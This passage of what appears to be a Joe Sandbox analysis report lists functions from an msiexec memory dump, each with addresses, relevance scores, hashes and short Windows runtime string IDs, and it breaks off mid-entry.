                                                                        • Instruction ID: 3f9991591fa0b51fd5a4bfad2d09671e2b88a14b4bf189ef4c66dad991dc34cd
                                                                        • Opcode Fuzzy Hash: 4ca3855d24f11f3f32619f95770e7b20cc3fc905ef4d1c3713a14055ecf70576
                                                                        • Instruction Fuzzy Hash: 4E714871A4034A9FCB01CFA8C981FAEB7F8AF58344F154065E904EB251EB35EB51CB60
                                                                        Function 221052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        • Opcode ID: a16b0d5a868ffd0a3f09c97e8ff9865cfaa1bf35426841e0008a627d39bab314
                                                                        • Instruction ID: f485bb2788bb9f33209d6c115176113c58a6ebd9bcf2300454016319b69252bf
                                                                        • Opcode Fuzzy Hash: a16b0d5a868ffd0a3f09c97e8ff9865cfaa1bf35426841e0008a627d39bab314
                                                                        • Instruction Fuzzy Hash: 13328970588351ABC7248F15C690FABB7E1BF84748F11496EFEA59B290E734DB40CB92
                                                                        Function 221BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 6b6ad887e92052ce41fa1055f62d87e09b9864df27e77c75533679c32e8bec8c
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: A8C1BD712883469FD724CF24C941FABBBF5AF84358F044A2DFA958A2D0D779E605CB81
                                                                        Function 2216E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 0-634100481
                                                                        • Opcode ID: b6e8a24063961ee1059dbdc8b0ff94b89d34d533d4fdb8e4f62ae39d88f8cd57
                                                                        • Instruction ID: a934820912986a2ebd06bb20003c3458925cdc4b297a291fc85130b7f7e87812
                                                                        • Opcode Fuzzy Hash: b6e8a24063961ee1059dbdc8b0ff94b89d34d533d4fdb8e4f62ae39d88f8cd57
                                                                        • Instruction Fuzzy Hash: AB613B72E403189FDB14CFA88980FBEBBB9FB44704F104269E659EB291DA31DA10CB50
                                                                        Function 2210F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$
                                                                        • API String ID: 0-233714265
                                                                        • Opcode ID: 18fdcace9c4d3fc8d85e759989606bb3e4e4d77a150e1200f0e6c4636bb9d765
                                                                        • Instruction ID: c28c871b8ec5908e83bc2f5b5bcf00e723a45a742aed2282785eea25624b738d
                                                                        • Opcode Fuzzy Hash: 18fdcace9c4d3fc8d85e759989606bb3e4e4d77a150e1200f0e6c4636bb9d765
                                                                        • Instruction Fuzzy Hash: B1618871A80789DFDB20CFA4C681FD9B7B1FB44708F20446AEA156B680CF74AB45CB95
                                                                        Function 220FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 220FA309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 220FA2FB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 62e475818fb81fc7ff52cf6b9ef7f157542816477602181c5a02e81b72129f30
                                                                        • Instruction ID: 12443ad5ec691ba5d95de9851fc76607c09d6b2f78402135cd245018f248c9fd
                                                                        • Opcode Fuzzy Hash: 62e475818fb81fc7ff52cf6b9ef7f157542816477602181c5a02e81b72129f30
                                                                        • Instruction Fuzzy Hash: 1641BC35A84B45DFCB15CF6AC980F9E77B4EF84314F1041A5E910DB2A1EB79DA00DB40
                                                                        Function 2212329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local\$@
                                                                        • API String ID: 0-380025441
                                                                        • Opcode ID: 52bd34c3361cf8772818f0a2915ccd9ddcee7041279505fcc78cae11e2bfd004
                                                                        • Instruction ID: 33b0366cf6c1d3d4e2734d11fc8106439d4d6920e5254a888d037e1925fba020
                                                                        • Opcode Fuzzy Hash: 52bd34c3361cf8772818f0a2915ccd9ddcee7041279505fcc78cae11e2bfd004
                                                                        • Instruction Fuzzy Hash: 6D317272588B559FC351CF28CA80E9BBBE8FBC4654F410A2EF99487250DA34DF05CB92
                                                                        Function 220F7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f38d923f3ebac59cdb0eaa921f9e918f6bb781e46ee3a17613f14290c9b3f2e0
                                                                        • Instruction ID: 669c2fd1d67da04cd335a96e2ba422130c5e1c2c2e9d353db716b5311ddc8084
                                                                        • Opcode Fuzzy Hash: f38d923f3ebac59cdb0eaa921f9e918f6bb781e46ee3a17613f14290c9b3f2e0
                                                                        • Instruction Fuzzy Hash: CEA16B71A48341DFC311CF28C580E5BBBE6BF98704F104A6DE5949B361EB74EA45CB92
                                                                        Function 2212F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0db2a63935e3b4477d098bd292dafedcf16fa6ac845f728d7b6809f3fce780e
                                                                        • Instruction ID: 2e50ec49c2b2451955c917d17c5776b5643234e8c2d12f0a421aaa34b4e36c57
                                                                        • Opcode Fuzzy Hash: b0db2a63935e3b4477d098bd292dafedcf16fa6ac845f728d7b6809f3fce780e
                                                                        • Instruction Fuzzy Hash: 544139B4940798DEDB14CFA9C980EAEBBF4FB48300F50466EE559A7211DB309A44CFA0
                                                                        Function 2212A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: 58b2f62480995ced039b2383a0404e9d5f1a31be459e4fd886e235905c6e03c4
                                                                        • Instruction ID: d76e00b7354984b7698a2b1d5892fb1bc9e0a03982dd1ce340c19bdef271b778
                                                                        • Opcode Fuzzy Hash: 58b2f62480995ced039b2383a0404e9d5f1a31be459e4fd886e235905c6e03c4
                                                                        • Instruction Fuzzy Hash: 91717C75E4035ADFDB18CFA8C690EFDBBB1BF58704F10812AE905A7245EB399A11CB50
                                                                        Function 220F973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                        • Instruction ID: b6f1c2c01dcf8371b2496916ab50c797b53f064e3836e6dda7c54eea63f7f403
                                                                        • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                        • Instruction Fuzzy Hash: 4C615872D8135DAFDB259FA5C940FDEBBB4FF84714F10426AE920A7290DB748A01DB60
                                                                        Function 2217F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                        • Instruction ID: 858ea9407f8c5236d313cd8a588f796fc9a40ffe81d0d3e13842552f64e6eb90
                                                                        • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                        • Instruction Fuzzy Hash: 8F51AC72584745AFD7128F14C940FABB7F8FB84754F000929BA809B290DBB4EE04CB92
                                                                        Function 2210E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 45f6c9b2713cc3ecc9b660b38c4cad774670df2a590f3204a2f8864602d562c5
                                                                        • Instruction ID: a8ad1a319fce956a6373f0a09f2fddf192c7abc12b4e2a6a1ad84d3a451fc92c
                                                                        • Opcode Fuzzy Hash: 45f6c9b2713cc3ecc9b660b38c4cad774670df2a590f3204a2f8864602d562c5
                                                                        • Instruction Fuzzy Hash: 7E418F725983019FD710CB66C980F9BB7D8AF88718F000A29FE84E7240EA34DB04C792
                                                                        Function 221AB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PreferredUILanguages
                                                                        • API String ID: 0-1884656846
                                                                        • Opcode ID: 7429848f42aeba94d2ef6c62435a753229426e3e24d01a120df279071d51a669
                                                                        • Instruction ID: af499ec6c0abfc93ef61574d5342d7a06eb9e8a043e6174fbfebab68fbab3031
                                                                        • Opcode Fuzzy Hash: 7429848f42aeba94d2ef6c62435a753229426e3e24d01a120df279071d51a669
                                                                        • Instruction Fuzzy Hash: 0D41CF7A940399ABCB12CE94C960FEFB7B9EF64754F010266EA11EB250D634DF40C7A0
                                                                        Function 2216C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: f2c78d886104fbf170246405893b0908d009988cd15a25712ce512f696ec65ec
                                                                        • Instruction ID: 559cad43a9aeceaa53245c813dbe41a3da45d6e6d2ec9e79abe459f9c0e8e4b9
                                                                        • Opcode Fuzzy Hash: f2c78d886104fbf170246405893b0908d009988cd15a25712ce512f696ec65ec
                                                                        • Instruction Fuzzy Hash: CC4173B1D4132CAEDB61CB60CD84FEEB77DAB54714F0045E5AA08AB140DB709F988FA4
                                                                        Function 2219705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: kLsE
                                                                        • API String ID: 0-3058123920
                                                                        • Opcode ID: 7b9ed681c2b71c8f65f69ad5f9dbfc5105b8bb42ac50d6678bcbdf5f5a939cc3
                                                                        • Instruction ID: ae79ce03513f1e417aeee593d290da63963dcf229c9ea69440ba67b68140d036
                                                                        • Opcode Fuzzy Hash: 7b9ed681c2b71c8f65f69ad5f9dbfc5105b8bb42ac50d6678bcbdf5f5a939cc3
                                                                        • Instruction Fuzzy Hash: 724128B16C13818BE7119FA0CD81FEB3BE0BF51768F540D69ED504A0CACB785A82C790
                                                                        Function 221236EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Flst
                                                                        • API String ID: 0-2374792617
                                                                        • Opcode ID: aa42521a1af05ea37ca319d52864ba457a12f83525a64ae393ed9c7f7243f105
                                                                        • Instruction ID: a6956cedc8f0fcf52e219b5190f78d055aad15bc967b0b67e6b259167afb4e79
                                                                        • Opcode Fuzzy Hash: aa42521a1af05ea37ca319d52864ba457a12f83525a64ae393ed9c7f7243f105
                                                                        • Instruction Fuzzy Hash: 9D41A9B16457129FC708CF28C580E6AFBE4EB49714F11826EE9588F241DB71DA42CBA1
                                                                        Function 220F5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: 4360ee6331618bbb7a3214b318f302f6931a944e8e045f13516a7dddd214f2b0
                                                                        • Instruction ID: 95b0a64c300e17fc24f967a2144bf4e3c2054d2ed7454845f359e5aea4df0de0
                                                                        • Opcode Fuzzy Hash: 4360ee6331618bbb7a3214b318f302f6931a944e8e045f13516a7dddd214f2b0
                                                                        • Instruction Fuzzy Hash: 2F1193303C57028BD7354A198951B5E7FD5FB95368F30863AE5A1CBB91DE71E841E380
                                                                        Function 2217106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrCreateEnclave
                                                                        • API String ID: 0-3262589265
                                                                        • Opcode ID: cedf101bba2f2ccfabe0a3d759abc7ea4922868891886cca14e534ded5adf7c3
                                                                        • Instruction ID: 0954527d6a1a11403edee98c89ef34d88ec8a4a3ba9748e0e4ebcb59f2955a55
                                                                        • Opcode Fuzzy Hash: cedf101bba2f2ccfabe0a3d759abc7ea4922868891886cca14e534ded5adf7c3
                                                                        • Instruction Fuzzy Hash: 282137B15483449FC310CF2AC945A5BFBF8FBD5710F400A1EB9949B264D7B09604CB92
                                                                        Function 2214739A Relevance: .7, Instructions: 705COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e27297a9dccca0e3c619994f357551bb2281fe20cd0a153f4536c19f20d620f
                                                                        • Instruction ID: d8d173293f4c7cd1b3e54b25956e7d031584d32488e957aeaff26f53e10cba0a
                                                                        • Opcode Fuzzy Hash: 4e27297a9dccca0e3c619994f357551bb2281fe20cd0a153f4536c19f20d620f
                                                                        • Instruction Fuzzy Hash: 4A428E71E407168FDB08CF59C990EEEB7B2FF88314B148569D959AB341DB34EA42CB90
                                                                        Function 2211B2C0 Relevance: .6, Instructions: 629COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e32ae27e1589c8d43bfbc96a3e535d49734bc94995caf4fe77fdf94109a9b79
                                                                        • Instruction ID: ef1f1bc961541539522765a1dde02dd4befd0d56a63c35153585c612457779c6
                                                                        • Opcode Fuzzy Hash: 2e32ae27e1589c8d43bfbc96a3e535d49734bc94995caf4fe77fdf94109a9b79
                                                                        • Instruction Fuzzy Hash: 27329972E403199BCB14CFA8C990FAEBBB2FF94714F150169E815AB391E7359B11CB90
                                                                        Function 22188158 Relevance: .6, Instructions: 617COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c79b4d9054f5bea90034ae8c04beda3ac6335739c8a11ba8840a3b6b83df324
                                                                        • Instruction ID: 6861a1bfe2b510183d25fee21784b9d66aab608b62aa231c3447f3d6e82651c6
                                                                        • Opcode Fuzzy Hash: 5c79b4d9054f5bea90034ae8c04beda3ac6335739c8a11ba8840a3b6b83df324
                                                                        • Instruction Fuzzy Hash: CA426B71A403188FEB24CF69C981BEEB7F6BF48304F558199E948EB242D7349A81CF51
                                                                        Function 2219A118 Relevance: .6, Instructions: 591COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 183c5c3c6828da10f589aa829cf54d153ebf856bd09047f8a0d8e8e710e34513
